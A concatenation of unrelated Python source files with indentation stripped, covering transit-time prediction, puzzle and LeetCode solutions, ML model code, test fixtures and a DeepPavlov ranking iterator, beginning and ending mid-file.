return (result, pos)
@staticmethod
def getTupleSize_(flags, axisCount):
size = 4
if (flags & EMBEDDED_TUPLE_COORD) != 0:
size += axisCount * 2
if (flags & INTERMEDIATE_TUPLE) != 0:
size += axisCount * 4
return size
|
import pickle
import csv
import pandas as pd
import numpy as np
def prediction(line, startID, endID):
model_file_a = "{}_a_2017_06.clf".format(line)
model_file_b = "{}_b_2017_06.clf".format(line)
time_table_file_a = "{}_a_timeTable.csv".format(line)
time_table_file_b = "{}_b_timeTable.csv".format(line)
df_a = pd.read_csv(time_table_file_a, index_col=0)
df_b = pd.read_csv(time_table_file_b, index_col=0)
stops_a = []
inputFeatures_a = []
for column in df_a.columns:
stops_a.append(df_a[column].loc[0])
inputFeatures_a.append(df_a[column].iloc[1])
stops_b = []
inputFeatures_b = []
for column in df_b.columns:
stops_b.append(df_b[column].loc[0])
inputFeatures_b.append(df_b[column].iloc[1])
sequence_a = 0
sequence_b = 0
if startID in stops_a and endID in stops_a:
stop_location = stops_a.index(endID)
start_location = stops_a.index(startID)
sequence_a = stop_location - start_location
if startID in stops_b and endID in stops_b:
stop_location = stops_b.index(endID)
start_location = stops_b.index(startID)
sequence_b = stop_location - start_location
if sequence_a > sequence_b:
pairs = sequence_a
model_file = model_file_a
station_number = len(stops_a)
inputFeatures = inputFeatures_a
plannedTime_first = df_a[df_a.columns[0]].iloc[1]
plannedTime_end = df_a[df_a.columns[-1]].iloc[1]
plannedTime_start = df_a[df_a.columns[start_location]].iloc[1]
plannedTime_stop = df_a[df_a.columns[stop_location]].iloc[1]
elif sequence_b > sequence_a:
pairs = sequence_b
model_file = model_file_b
station_number = len(stops_b)
inputFeatures = inputFeatures_b
plannedTime_first = df_b[df_b.columns[0]].iloc[1]
plannedTime_end = df_b[df_b.columns[-1]].iloc[1]
plannedTime_start = df_b[df_b.columns[start_location]].iloc[1]
plannedTime_stop = df_b[df_b.columns[stop_location]].iloc[1]
else:
return 0
pkl_file = open(model_file, 'rb')
new_clf = pickle.load(pkl_file)
predictions = new_clf.predict([inputFeatures])
pred_full_time = predictions[0][1] - predictions[0][0]
planned_full_time = plannedTime_end - plannedTime_first
planned_pairs_time = plannedTime_stop - plannedTime_start
#pair_time = (predictions[0][1]-predictions[0][0])/(station_number-1)
#print("end/first: {}/{}".format(predictions[0][1],predictions[0][0]))
#print("stop/start: {}/{}".format(plannedTime_stop, plannedTime_start))
#print(pair_time, pairs)
#return pair_time * pairs
# planned_full_time/planned_pairs_time = pred_full_time/pred_pairs_time
pred_pairs_time = pred_full_time * planned_pairs_time / planned_full_time
return pred_pairs_time
def main():
print(prediction('39A', 1913, 1660))
print(prediction('39A', 1864, 335))
print(prediction('39A', 6112, 1867))
if __name__ == '__main__':
main()
|
import mypackage.subpackage.module2
def test_eggs():
output = mypackage.subpackage.module2.eggs(2)
expected = "2 eggs, please!"
assert output == expected
|
import datetime
print(datetime.datetime.today().ctime())
|
'''
Elections are in progress!
Given an array of the numbers of votes given to each of the candidates so far, and an integer k equal to the number of voters who haven't cast their vote yet, find the number of candidates who still have a chance to win the election.
The winner of the election must secure strictly more votes than any other candidate. If two or more candidates receive the same (maximum) number of votes, assume there is no winner at all.
'''
def electionsWinners(votes, k):
currentWinner = max(votes)
res = 0
if k > 0:
# If we have votes left, the ones with the max number of votes can win and also the ones that
# their votes plus the votes left are greater than the currentWinner
for i in range(len(votes)):
if votes[i] + k > currentWinner:
res += 1
return res
else:
# If we don't have any votes left, we can only have one winner or no winner at all.
# If 2 or more have the max votes, theres no winner
aux = 0
for i in range(len(votes)):
if votes[i] == currentWinner:
aux += 1
if aux > 1:
return 0
return 1
|
#!/usr/bin/env python
# Solution for http://adventofcode.com/2016/
import re
class Screen:
def __init__(self, width=50, height=6):
self.width = width
self.height = height
self.pixels = []
for i in xrange(self.height):
self.pixels.append(['.'] * self.width)
def show(self):
return '\n'.join(map(lambda x: ''.join(x), self.pixels))
def count_lit_pixels(self):
return sum(map(lambda x: x.count('#'), self.pixels))
def get_row(self, a):
return self.pixels[a]
def get_column(self, a):
return [self.pixels[x][a] for x in xrange(self.height)]
def set_row(self, a, row):
self.pixels[a] = row
def set_column(self, a, column):
for i in xrange(self.height):
self.pixels[i][a] = column[i]
def rect(self, a, b):
for i in xrange(b):
for j in xrange(a):
self.pixels[i][j] = '#'
def rotate_row(self, a, b):
row = self.get_row(a)
new_row = row[-b % self.width:] + row[:-b % self.width]
self.set_row(a, new_row)
def rotate_column(self, a, b):
column = self.get_column(a)
new_column = column[-b % self.height:] + column[:-b % self.height]
self.set_column(a, new_column)
def cmd(self, cmd):
m = re.match(r"rect (\d+)x(\d+)", cmd)
if m:
return self.rect(int(m.group(1)), int(m.group(2)))
m = re.match(r"rotate column x=(\d+) by (\d+)", cmd)
if m:
return self.rotate_column(int(m.group(1)), int(m.group(2)))
m = re.match(r"rotate row y=(\d+) by (\d+)", cmd)
if m:
return self.rotate_row(int(m.group(1)), int(m.group(2)))
raise Exception("Bad command or file name: %s" % cmd)
print "Work with sample data"
s = Screen(7, 3)
s.cmd('rect 3x2')
s.cmd('rotate column x=1 by 1')
s.cmd('rotate row y=0 by 4')
s.cmd('rotate column x=1 by 1')
print s.show()
print "Number of pixels lit is", s.count_lit_pixels()
print "Work with real data"
s = Screen()
with open('advent_2016_8.txt') as fp:
line = fp.readline().strip()
while line and line != '':
s.cmd(line)
line = fp.readline().strip()
print s.show()
print "Number of pixels lit is", s.count_lit_pixels()
|
"""Doby README testing"""
from doby.build import setup_py
def test_build_setup_empty():
"""Test build_setup_empty"""
function = {}
assert setup_py.build_setup(function) == ""
def test_build_setup_one_required_key_missing():
"""Test build_setup_one_required_key_missing"""
function = {}
function["description"] = "fruitTest configuration library"
function["name"] = "fruitTest"
function["setup"] = {}
function["requirements"] = {
"apple": {},
"orange": {"builtin": True, "operator": "==", "version": "1.0.0"},
"pear": {"builtin": False, "operator": "==", "version": "1.0.0"},
"lime": {"builtin": False, "operator": "=="},
}
setup = function["setup"]
setup["author"] = "Me"
setup["author_email"] = "me@example.com"
setup["url"] = "https://example.com"
assert setup_py.build_setup(function) == ""
def test_build_setup_no_extras():
"""Test build_setup_no_extras"""
function = {}
function["description"] = "fruitTest configuration library"
function["name"] = "fruitTest"
function["setup"] = {}
function["requirements"] = {
"apple": {},
"orange": {"builtin": True, "operator": "==", "version": "1.0.0"},
"pear": {"builtin": False, "operator": "==", "version": "1.0.0"},
"lime": {"builtin": False, "operator": "=="},
}
setup = function["setup"]
setup["version"] = "1.0.0"
setup["author"] = "Me"
setup["author_email"] = "me@example.com"
setup["url"] = "https://example.com"
assert setup_py.build_setup(function) == [
"import setuptools",
"",
'with open("README.md", "r") as fh:',
" LONG_DESCRIPTION = fh.read()",
"",
'setuptools.setup(name="fruitTest", version="1.0.0", author="Me", '
'author_email="me@example.com", url="https://example.com", '
'description="fruitTest configuration library", '
"long_description=LONG_DESCRIPTION, "
'long_description_content_type="text/markdown", classifiers=[], '
"install_requires=['reqrest', 'apple', 'pear', 'lime'], "
"include_package_data=True)",
]
def test_build_setup_all():
"""Test build_setup_all"""
function = {}
function["description"] = "fruitTest configuration library"
function["name"] = "fruitTest"
function["setup"] = {}
function["requirements"] = {
"apple": {},
"orange": {"builtin": True, "operator": "==", "version": "1.0.0"},
"pear": {"builtin": False, "operator": "==", "version": "1.0.0"},
"lime": {"builtin": False, "operator": "=="},
}
setup = function["setup"]
setup["version"] = "1.0.0"
setup["author"] = "Me"
setup["author_email"] = "me@example.com"
setup["url"] = "https://example.com"
setup["developmentStatus"] = "5 - Production/Stable"
setup["license"] = "OSI Approved :: Apache Software License"
setup["operatingSystem"] = "OS Independent"
setup["pythonVersion"] = "Python :: 3"
assert setup_py.build_setup(function) == [
"import setuptools",
"",
'with open("README.md", "r") as fh:',
" LONG_DESCRIPTION = fh.read()",
"",
'setuptools.setup(name="fruitTest", version="1.0.0", author="Me", '
'author_email="me@example.com", url="https://example.com", '
'description="fruitTest configuration library", '
"long_description=LONG_DESCRIPTION, "
'long_description_content_type="text/markdown", classifiers=["Development '
'Status :: 5 - Production/Stable","License Status :: OSI Approved :: Apache '
'Software License","Operating System :: OS Independent","Programming Language '
":: Python :: 3\",], install_requires=['reqrest', 'apple', 'pear', "
"'lime'], include_package_data=True)",
]
|
"""制約。"""
import tensorflow as tf
@tf.keras.utils.register_keras_serializable(package="pytoolkit")
class GreaterThanOrEqualTo(tf.keras.constraints.Constraint):
"""指定した値以上に制約する。"""
def __init__(self, value, **kwargs):
super().__init__(**kwargs)
self.value = value
def __call__(self, w):
return tf.math.maximum(w, self.value)
def get_config(self):
config = {"value": self.value}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
@tf.keras.utils.register_keras_serializable(package="pytoolkit")
class Clip(tf.keras.constraints.Constraint):
"""指定した値の範囲に制約する。"""
def __init__(self, min_value, max_value, **kwargs):
super().__init__(**kwargs)
self.min_value = min_value
self.max_value = max_value
def __call__(self, w):
return tf.clip_by_value(w, self.min_value, self.max_value)
def get_config(self):
config = {"min_value": self.min_value, "max_value": self.max_value}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
|
import dolfin as dl
import numpy as np
import math
from datetime import datetime
STATE = 0
PARAMETER = 1
def validate_date(date_text):
try:
datetime.strptime(date_text, '%Y-%m-%d')
except ValueError:
raise ValueError("Incorrect data format, should be YYYY-MM-DD")
class seird_misfit:
def __init__(self, infected_cases, deceased_cases, date, simulation_time, truncated_gaussian = False, data_start_date="2020-03-06"):
self.noise_variance = None
self.truncated_gaussian = truncated_gaussian
validate_date(date)
d0 = datetime.strptime(data_start_date, "%Y-%m-%d")
d1 = datetime.strptime(date, "%Y-%m-%d")
day_index = abs((d1-d0)).days
if not infected_cases.size == deceased_cases.size:
raise IndexError("The total decease cases data and the total infected cases data does not match in size. Please re-check the data")
self.data = np.empty((round(simulation_time), 2))
self.data[:, 0] = infected_cases[day_index+1:(day_index + round(simulation_time)+1):1]
self.data[:, 1] = deceased_cases[day_index+1:(day_index + round(simulation_time)+1):1]
def set_noise_variance(self, percentages):
"""Setting the noise variance based on the percentages (numpy array of 2 values) at one standard deviation"""
self.noise_variance = np.empty_like(self.data)
for i in range(self.data.shape[0]):
for j in range(self.data.shape[1]):
self.noise_variance[i,j] = (self.data[i,j]*percentages[j])**2
def cost(self, x):
if self.noise_variance is None:
raise ValueError("Noise Variance must be specified")
if not x[STATE].shape == self.data.shape:
raise IndexError("The state output is of shape ", x[STATE].shape, ", while data is of shape ", self.data.shape, ".")
if self.truncated_gaussian:
misfit = 0.0
for i in range(self.data.shape[0]):
for j in range(self.data.shape[1]):
if x[STATE][i, j] < self.data[i,j]:
misfit = math.inf
break
else:
misfit += 0.5*(x[STATE][i, j] - self.data[i,j])**2/(self.noise_variance[i,j]) + math.log(2.)
return misfit
else:
return np.sum(np.divide(np.power(self.data - x[STATE], 2), 2*self.noise_variance))
|
import bpy, os
xy = os.environ['XY']
for scene in bpy.data.scenes:
scene.render.resolution_x = int(xy)
scene.render.resolution_y = int(xy)
scene.render.filepath = 'res/icons/hicolor/%sx%s/apps/%s.png'%(xy, xy, os.environ['APP_ID'])
scene.frame_end = 1
bpy.ops.render.render(write_still=True)
|
import torch
import torch.nn as nn
from torch.autograd import Variable
from models.rnn import CustomRNN
import transformers as ppb
class EncoderRNN(nn.Module):
""" Encodes navigation instructions, returning hidden state context (for
attention methods) and a decoder initial state. """
def __init__(self, opts, vocab_size, embedding_size, hidden_size, padding_idx,
dropout_ratio, bidirectional=False, num_layers=1):
super(EncoderRNN, self).__init__()
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.embedding_size = embedding_size
hidden_size = hidden_size // 2 if bidirectional else hidden_size
self.num_layers = num_layers
self.embedding = nn.Embedding(vocab_size, embedding_size, padding_idx)
self.drop = nn.Dropout(p=dropout_ratio)
self.bidirectional = bidirectional
self.rnn_kwargs = {
'cell_class': nn.LSTMCell,
'input_size': embedding_size,
'hidden_size': hidden_size,
'num_layers': num_layers,
'batch_first': True,
'dropout': 0,
}
self.rnn = CustomRNN(**self.rnn_kwargs)
def create_mask(self, batchsize, max_length, length):
"""Given the length create a mask given a padded tensor"""
tensor_mask = torch.zeros(batchsize, max_length)
for idx, row in enumerate(tensor_mask):
row[:length[idx]] = 1
return tensor_mask.to(self.device)
def flip(self, x, dim):
indices = [slice(None)] * x.dim()
indices[dim] = torch.arange(x.size(dim) - 1, -1, -1,
dtype=torch.long, device=x.device)
return x[tuple(indices)]
def forward(self, inputs, lengths):
"""
Expects input vocab indices as (batch, seq_len). Also requires a list of lengths for dynamic batching.
"""
embeds = self.embedding(inputs) # (batch, seq_len, embedding_size)
embeds = self.drop(embeds)
embeds_mask = self.create_mask(embeds.size(0), embeds.size(1), lengths)
if self.bidirectional:
output_1, (ht_1, ct_1) = self.rnn(embeds, mask=embeds_mask)
output_2, (ht_2, ct_2) = self.rnn(self.flip(embeds, 1), mask=self.flip(embeds_mask, 1))
output = torch.cat((output_1, self.flip(output_2, 0)), 2)
ht = torch.cat((ht_1, ht_2), 2)
ct = torch.cat((ct_1, ct_2), 2)
else:
output, (ht, ct) = self.rnn(embeds, mask=embeds_mask)
return output.transpose(0, 1), ht.squeeze(), ct.squeeze(), embeds_mask
class EncoderConfigBert(nn.Module):
''' Encodes navigation configuration, returning bert representation of each configuration '''
def __init__(self, opts, vocab_size, embedding_size, hidden_size, padding_idx,
dropout_ratio, bidirectional=False, num_layers=1):
super(EncoderConfigBert, self).__init__()
model_class, tokenizer_class, pretrained_weights = (ppb.BertModel, ppb.BertTokenizer, 'bert-base-uncased')
self.bert_tokenizer = tokenizer_class.from_pretrained(pretrained_weights)
self.bert_model = model_class.from_pretrained(pretrained_weights)
self.drop = nn.Dropout(p=dropout_ratio)
self.num_directions = 2 if bidirectional else 1
self.num_layers = num_layers
self.hidden_size = hidden_size
self.sf = SoftAttention(dimension=embedding_size)
def init_state(self, batch_size, max_config_num):
""" Initial state of model
a_0: batch x max_config_num
a_0: batch x 2
h_0: batch x hidden_size
c_0: batch x hidden_size
"""
a0 = Variable(torch.zeros(
batch_size,
#max_config_num,
10,
device=self.bert_model.device
), requires_grad=False)
a0[:,0] = 1
r0 = Variable(torch.zeros(
batch_size,
4,
device=self.bert_model.device
), requires_grad=False)
r0[:,0] = 1
h0 = Variable(torch.zeros(
batch_size,
self.hidden_size,
device=self.bert_model.device
), requires_grad=False)
c0 = Variable(torch.zeros(
batch_size,
self.hidden_size,
device=self.bert_model.device
), requires_grad=False)
return a0, r0, h0, c0
def bert_embedding(self, inputs, sep_list):
start = 0
features = []
token_features = []
padded_masks = []
token_padded_masks = []
tokenized_dict = self.bert_tokenizer.batch_encode_plus(inputs, add_special_tokens=True, return_attention_mask=True, return_tensors='pt', pad_to_max_length=True)
padded = tokenized_dict['input_ids'].to(self.bert_model.device)
attention_mask = tokenized_dict['attention_mask'].to(self.bert_model.device)
with torch.no_grad():
last_hidden_states = self.bert_model(padded, attention_mask=attention_mask)
# len(inputs) * embedding_size (274 * 768)
temp_feature = last_hidden_states[0]
#max_length = max(sep_list)
max_length = 10
for each_sep in sep_list:
end = start + min(each_sep, max_length)
# len(each_sep) * embedding_size (2 * 768)
feature = temp_feature[start:end,0,:]
feature = torch.zeros(max_length, temp_feature.shape[2], device=self.bert_model.device)
token_feature = torch.zeros(max_length, temp_feature.shape[1], temp_feature.shape[2], device=self.bert_model.device)
token_padded_mask = torch.zeros(max_length,temp_feature.shape[1], device=self.bert_model.device)
feature[0:(end-start), :] = temp_feature[start:end,0,:]
token_feature[0:(end-start),:,:] = temp_feature[start:end,:,:] # 10 x 13 x 768
# tmp_token_padded_mask = padded[start:end]
# token_padded_mask[0:(end-start),:]= torch.where(tmp_token_padded_mask>0, torch.full_like(tmp_token_padded_mask, 1), tmp_token_padded_mask)
token_padded_mask[0:(end-start),:] = attention_mask[start:end]
start += each_sep
# max_config_num * embedding_size (3 * 768)
#feature = torch.cat((feature, torch.zeros(max_length//each_sep, feature.shape[1], device=self.bert_model.device)), dim=0)
# 1 * max_config_num (1 * 3)
padded_mask = torch.zeros(max_length, device=self.bert_model.device)
padded_mask[:each_sep] = 1
features.append(feature)
token_features.append(token_feature)
padded_masks.append(padded_mask)
token_padded_masks.append(token_padded_mask)
# batch_size * max_config_num * embedding_size (100 * 3 * 768)
features = torch.stack(features, dim=0)
# batch_size * 1 * max_config_num (100 * 1 * 3)
padded_masks = torch.stack(padded_masks, dim= 0)
token_features = torch.stack(token_features, dim=0)
token_padded_masks = torch.stack(token_padded_masks, dim=0)
return features, padded_masks, token_features, token_padded_masks
def forward(self, inputs, sep_list):
"""
embeds: batch x max_len_config x embedding_size
a_t: batch x max_len_config
"""
embeds, padded_mask, token_features, token_padded_masks = self.bert_embedding(inputs, sep_list) # 10 x 768
weighted_embeds, attn = self.sf(embeds, padded_mask, token_features,token_padded_masks) # 10 x 768; 10 x x 768
return weighted_embeds, padded_mask
class SoftAttention(nn.Module):
"""Soft-Attention without learnable parameters
"""
def __init__(self, dimension):
super(SoftAttention, self).__init__()
self.softmax = nn.Softmax(dim=2)
self.conf_linear = nn.Linear(768, 768)
def forward(self, cls_input, cls_mask, token_input, token_mask):
"""Propagate h through the network.
cls_input: batch x 10 x 768
cls_mask: batch x 10
cls_input: batch x 10 x max_token_len x 768
token_mask: batch x 10 x 13
"""
# Get attention
cls_input = self.conf_linear(cls_input)
attn = torch.matmul(cls_input.unsqueeze(dim=2), token_input.transpose(2,3)).squeeze(2) # batch x 10 x 13
if token_mask is not None:
attn.data.masked_fill_((token_mask == 0).data, -float('inf')) #batch x 10 x 13
attn = self.softmax(attn)
new_attn = torch.where(attn != attn, torch.zeros_like(attn), attn)
weighted_token_input = torch.matmul(new_attn.unsqueeze(dim=2), token_input).squeeze(2) # batch x 10 x 768
return weighted_token_input, attn
|
import logging
from dataclasses import dataclass
from enum import Enum
from functools import wraps
import numpy as np
import pytest
from sklearn.base import BaseEstimator
from sklearn.base import TransformerMixin
from sklearn.datasets import load_boston
from sklearn.datasets import load_iris
from sklearn.decomposition import PCA
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.pipeline import FeatureUnion
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
@dataclass
class TrainTestSet:
X_train: np.ndarray
X_test: np.ndarray
y_train: np.ndarray
y_test: np.ndarray
class SomeEnum(Enum):
A = 1
B = 2
class TransformerWithEnum(BaseEstimator, TransformerMixin):
def __init__(self, param: SomeEnum):
self.param = param
def fit(self, X, y):
return self
def transform(self, X):
return X
@pytest.fixture(scope="function")
def regression_model(request):
pipeline = Pipeline(
steps=[
(
"fu",
FeatureUnion(
transformer_list=[
("ss", StandardScaler()),
("pca", PCA()),
]
),
),
("et", TransformerWithEnum(param=SomeEnum.A)),
("rf", RandomForestRegressor()),
]
)
return pipeline
@pytest.fixture(scope="function")
def classification_model(request):
pipeline = Pipeline(
steps=[
(
"fu",
FeatureUnion(
transformer_list=[
("ss", StandardScaler()),
("pca", PCA()),
]
),
),
("et", TransformerWithEnum(param=SomeEnum.A)),
("rf", RandomForestClassifier()),
]
)
return pipeline
@pytest.fixture(scope="function")
def classification_model_multi(request):
pipeline = Pipeline(
steps=[
(
"fu",
FeatureUnion(
transformer_list=[
("ss", StandardScaler()),
("ss2", StandardScaler()),
("pca", PCA()),
("pca2", PCA()),
]
),
),
("et", TransformerWithEnum(param=SomeEnum.A)),
("rf", RandomForestClassifier()),
]
)
return pipeline
@pytest.fixture
def boston(request):
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.25, random_state=42
)
return {
"X_train": X_train,
"X_test": X_test,
"y_train": y_train,
"y_test": y_test,
}
@pytest.fixture
def iris(request):
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.25, random_state=42
)
iris = TrainTestSet(
X_train=X_train,
X_test=X_test,
y_train=y_train,
y_test=y_test,
)
return iris
@pytest.fixture(scope="function")
def simple_decorator(request):
def decorator(func, **dkwargs):
@wraps(func)
def wrapper(*args, **kwargs):
logging.info("hello world")
return func(*args, **kwargs)
return wrapper
return decorator
@pytest.fixture(params=[False, True])
def full(request):
return request.param
|
import re
class BleHelper:
@classmethod
def uuid_filter(cls, uuid):
return re.sub(r"[^0-9abcdef]", "", uuid.lower())
|
#
# @lc app=leetcode id=849 lang=python3
#
# [849] Maximize Distance to Closest Person
#
# https://leetcode.com/problems/maximize-distance-to-closest-person/description/
#
# algorithms
# Medium (44.73%)
# Likes: 2313
# Dislikes: 154
# Total Accepted: 155.4K
# Total Submissions: 330K
# Testcase Example: '[1,0,0,0,1,0,1]'
#
# You are given an array representing a row of seats where seats[i] = 1
# represents a person sitting in the i^th seat, and seats[i] = 0 represents
# that the i^th seat is empty (0-indexed).
#
# There is at least one empty seat, and at least one person sitting.
#
# Alex wants to sit in the seat such that the distance between him and the
# closest person to him is maximized.
#
# Return that maximum distance to the closest person.
#
#
# Example 1:
#
#
# Input: seats = [1,0,0,0,1,0,1]
# Output: 2
# Explanation:
# If Alex sits in the second open seat (i.e. seats[2]), then the closest person
# has distance 2.
# If Alex sits in any other open seat, the closest person has distance 1.
# Thus, the maximum distance to the closest person is 2.
#
#
# Example 2:
#
#
# Input: seats = [1,0,0,0]
# Output: 3
# Explanation:
# If Alex sits in the last seat (i.e. seats[3]), the closest person is 3 seats
# away.
# This is the maximum distance possible, so the answer is 3.
#
#
# Example 3:
#
#
# Input: seats = [0,1]
# Output: 1
#
#
#
# Constraints:
#
#
# 2 <= seats.length <= 2 * 10^4
# seats[i] is 0 or 1.
# At least one seat is empty.
# At least one seat is occupied.
#
#
#
# @lc code=start
class Solution:
def maxDistToClosest(self, seats: List[int]) -> int:
first_loc = -1
last_loc = -1
n = len(seats)
locs = []
for i in range(n):
if seats[i] == 1:
locs.append(i)
first_loc = locs[0]
last_loc = locs[-1]
distances = [first_loc, n-last_loc-1]
for i in range(1, len(locs)):
diff = locs[i] - locs[i-1]
distances.append(diff // 2)
return max(distances)
# @lc code=end
|
# -*- coding: utf-8 -*-
from django.apps import AppConfig
class MezaExtConfig(AppConfig):
name = 'mezaext'
verbose_name = u'CMS расширения'
|
from deeppavlov.core.common.registry import register
from deeppavlov.core.data.data_learning_iterator import DataLearningIterator
import numpy as np
import random
from typing import Dict, List, Tuple
@register('ranking_iterator')
class RankingIterator(DataLearningIterator):
"""The class contains methods for iterating over a dataset for ranking in training, validation and test mode.
Note:
Each sample in ``data['train']`` is arranged as follows:
``{'context': 21507, 'response': 7009, 'pos_pool': [7009, 7010], 'neg_pool': None}``.
The context has a 'context' key in the data sample.
It is represented by a single integer.
The correct response has the 'response' key in the sample,
its value is also always a single integer.
The list of possible correct responses (there may be several) can be
obtained
with the 'pos\_pool' key.
The value of the 'response' should be equal to the one item from the
list
obtained using the 'pos\_pool' key.
The list of possible negative responses (there can be a lot of them,
100–10000) is represented by the key 'neg\_pool'.
Its value is None, when global sampling is used, or the list of fixed
length, when sampling from predefined negative responses is used.
It is important that values in 'pos\_pool' and 'negative\_pool' do
not overlap.
Single items in 'context', 'response', 'pos\_pool', 'neg\_pool' are
represented
by single integers that give lists of integers
using some dictionary `integer–list of integers`.
These lists of integers are converted to lists of tokens with
some dictionary `integer–token`.
Samples in ``data['valid']`` and ``data['test']`` representation are almost the same
as the train sample shown above.
Args:
data: A dictionary containing training, validation and test parts of the dataset obtainable via
``train``, ``valid`` and ``test`` keys.
sample_candidates_pool: Whether to sample candidates from a predefined pool of candidates
for each sample in training mode. If ``False``, negative sampling from the whole data will be performed.
sample_candidates_pool_valid: Whether to validate a model on a predefined pool of candidates for each sample.
If ``False``, sampling from the whole data will be performed for validation.
sample_candidates_pool_test: Whether to test a model on a predefined pool of candidates for each sample.
If ``False``, sampling from the whole data will be performed for test.
num_negative_samples: A size of a predefined pool of candidates
or a size of data subsample from the whole data in training mode.
num_ranking_samples_valid: A size of a predefined pool of candidates
or a size of data subsample from the whole data in validation mode.
num_ranking_samples_test: A size of a predefined pool of candidates
or a size of data subsample from the whole data in test mode.
seed: Random seed.
shuffle: Whether to shuffle data.
len_vocab: A length of a vocabulary to perform sampling in training, validation and test mode.
pos_pool_sample: Whether to sample response from `pos_pool` each time when the batch is generated.
If ``False``, the response from `response` will be used.
pos_pool_rank: Whether to count samples from the whole `pos_pool` as correct answers in test / validation mode.
random_batches: Whether to choose batches randomly or iterate over data sequentally in training mode.
batches_per_epoch: A number of batches to choose per each epoch in training mode.
Only required if ``random_batches`` is set to ``True``.
triplet_mode: Whether to use a model with triplet loss.
If ``False``, a model with crossentropy loss will be used.
hard_triplets_sampling: Whether to use hard triplets method of sampling in training mode.
num_positive_samples: A number of contexts to choose from `pos_pool` for each `context`.
Only required if ``hard_triplets_sampling`` is set to ``True``.
"""
def __init__(self,
data: Dict[str, List],
sample_candidates_pool: bool = False,
sample_candidates_pool_valid: bool = True,
sample_candidates_pool_test: bool = True,
num_negative_samples: int = 10,
num_ranking_samples_valid: int = 10,
num_ranking_samples_test: int = 10,
seed: int = None,
shuffle: bool = False,
len_vocab: int = 0,
pos_pool_sample: bool = False,
pos_pool_rank: bool = True,
random_batches: bool = False,
batches_per_epoch: int = None,
triplet_mode: bool = True,
hard_triplets_sampling: bool = False,
num_positive_samples: int = 5):
self.sample_candidates_pool = sample_candidates_pool
self.sample_candidates_pool_valid = sample_candidates_pool_valid
self.sample_candidates_pool_test = sample_candidates_pool_test
self.num_negative_samples = num_negative_samples
self.num_ranking_samples_valid = num_ranking_samples_valid
self.num_ranking_samples_test = num_ranking_samples_test
self.len_vocab = len_vocab
self.pos_pool_sample = pos_pool_sample
self.pos_pool_rank = pos_pool_rank
self.random_batches = random_batches
self.batches_per_epoch = batches_per_epoch
self.triplet_mode = triplet_mode
self.hard_triplets_sampling = hard_triplets_sampling
self.num_positive_samples = num_positive_samples
np.random.seed(seed)
self.train = data.get('train', [])
self.valid = data.get('valid', [])
self.test = data.get('test', [])
self.data = {
'train': self.train,
'valid': self.valid,
'test': self.test,
'all': self.train + self.test + self.valid
}
super().__init__(self.data, seed=seed, shuffle=shuffle)
def gen_batches(self, batch_size: int, data_type: str = "train", shuffle: bool = True)->\
Tuple[List[List[Tuple[int, int]]], List[int]]:
"""Generate batches of inputs and expected outputs to train neural networks.
Args:
batch_size: number of samples in batch
data_type: can be either 'train', 'test', or 'valid'
shuffle: whether to shuffle dataset before batching
Returns:
A tuple of a batch of inputs and a batch of expected outputs.
Inputs and expected outputs have different structure and meaning
depending on class attributes values and ``data_type``.
"""
data = self.data[data_type]
if self.random_batches and self.batches_per_epoch is not None and data_type == "train":
num_steps = self.batches_per_epoch
assert(batch_size <= len(data))
else:
num_steps = len(data) // batch_size
if data_type == "train":
if shuffle:
np.random.shuffle(data)
for i in range(num_steps):
if self.random_batches:
context_response_data = np.random.choice(data, size=batch_size, replace=False)
else:
context_response_data = data[i * batch_size:(i + 1) * batch_size]
context = [el["context"] for el in context_response_data]
if self.pos_pool_sample:
response = [random.choice(el["pos_pool"]) for el in context_response_data]
else:
response = [el["response"] for el in context_response_data]
if self.triplet_mode:
negative_response = self._create_neg_resp_rand(context_response_data, batch_size)
if self.hard_triplets_sampling:
labels = [el["label"] for el in context_response_data]
positives = [random.choices(el["pos_pool"], k=self.num_positive_samples)
for el in context_response_data]
x = [[(context[i], el) for el in positives[i]] for i in range(len(context_response_data))]
y = labels
else:
x = [[(context[i], el) for el in [response[i]] + [negative_response[i]]]
for i in range(len(context_response_data))]
y = batch_size * [np.ones(2)]
else:
y = [el["label"] for el in context_response_data]
x = [[(context[i], response[i])] for i in range(len(context_response_data))]
yield (x, y)
if data_type in ["valid", "test"]:
for i in range(num_steps + 1):
if i < num_steps:
context_response_data = data[i * batch_size:(i + 1) * batch_size]
else:
if len(data[i * batch_size:len(data)]) > 0:
context_response_data = data[i * batch_size:len(data)]
context = [el["context"] for el in context_response_data]
if data_type == "valid":
ranking_length = self.num_ranking_samples_valid
sample_candidates_pool = self.sample_candidates_pool_valid
elif data_type == "test":
ranking_length = self.num_ranking_samples_test
sample_candidates_pool = self.sample_candidates_pool_test
if not sample_candidates_pool:
ranking_length = self.len_vocab
response_data = self._create_rank_resp(context_response_data, ranking_length)
if self.pos_pool_rank:
y = [len(el["pos_pool"]) * np.ones(ranking_length) for el in context_response_data]
else:
y = [np.ones(ranking_length) for _ in context_response_data]
x = [[(context[i], el) for el in response_data[i]] for i in range(len(context_response_data))]
yield (x, y)
def _create_neg_resp_rand(self, context_response_data, batch_size):
"""Randomly chooses negative response for each context in a batch.
Sampling is performed from predefined pools of candidates or from the whole data.
Args:
context_response_data: A batch from the train part of the dataset.
batch_size: A batch size.
Returns:
one negative response for each context in a batch.
"""
if self.sample_candidates_pool:
negative_response_data = [random.choice(el["neg_pool"])
for el in context_response_data]
else:
candidates = []
for i in range(batch_size):
candidate = np.random.randint(0, self.len_vocab, 1)[0]
while candidate in context_response_data[i]["pos_pool"]:
candidate = np.random.randint(0, self.len_vocab, 1)[0]
candidates.append(candidate)
negative_response_data = candidates
return negative_response_data
def _create_rank_resp(self, context_response_data, ranking_length):
"""Chooses a set of negative responses for each context in a batch to evaluate ranking quality.
Negative responses are taken from predefined pools of candidates or from the whole data.
Args:
context_response_data: A batch from the train part of the dataset.
ranking_length: a number of responses for each context to evaluate ranking quality.
Returns:
list of responses for each context in a batch.
"""
response_data = []
for i in range(len(context_response_data)):
pos_pool = context_response_data[i]["pos_pool"]
resp = context_response_data[i]["response"]
if self.pos_pool_rank:
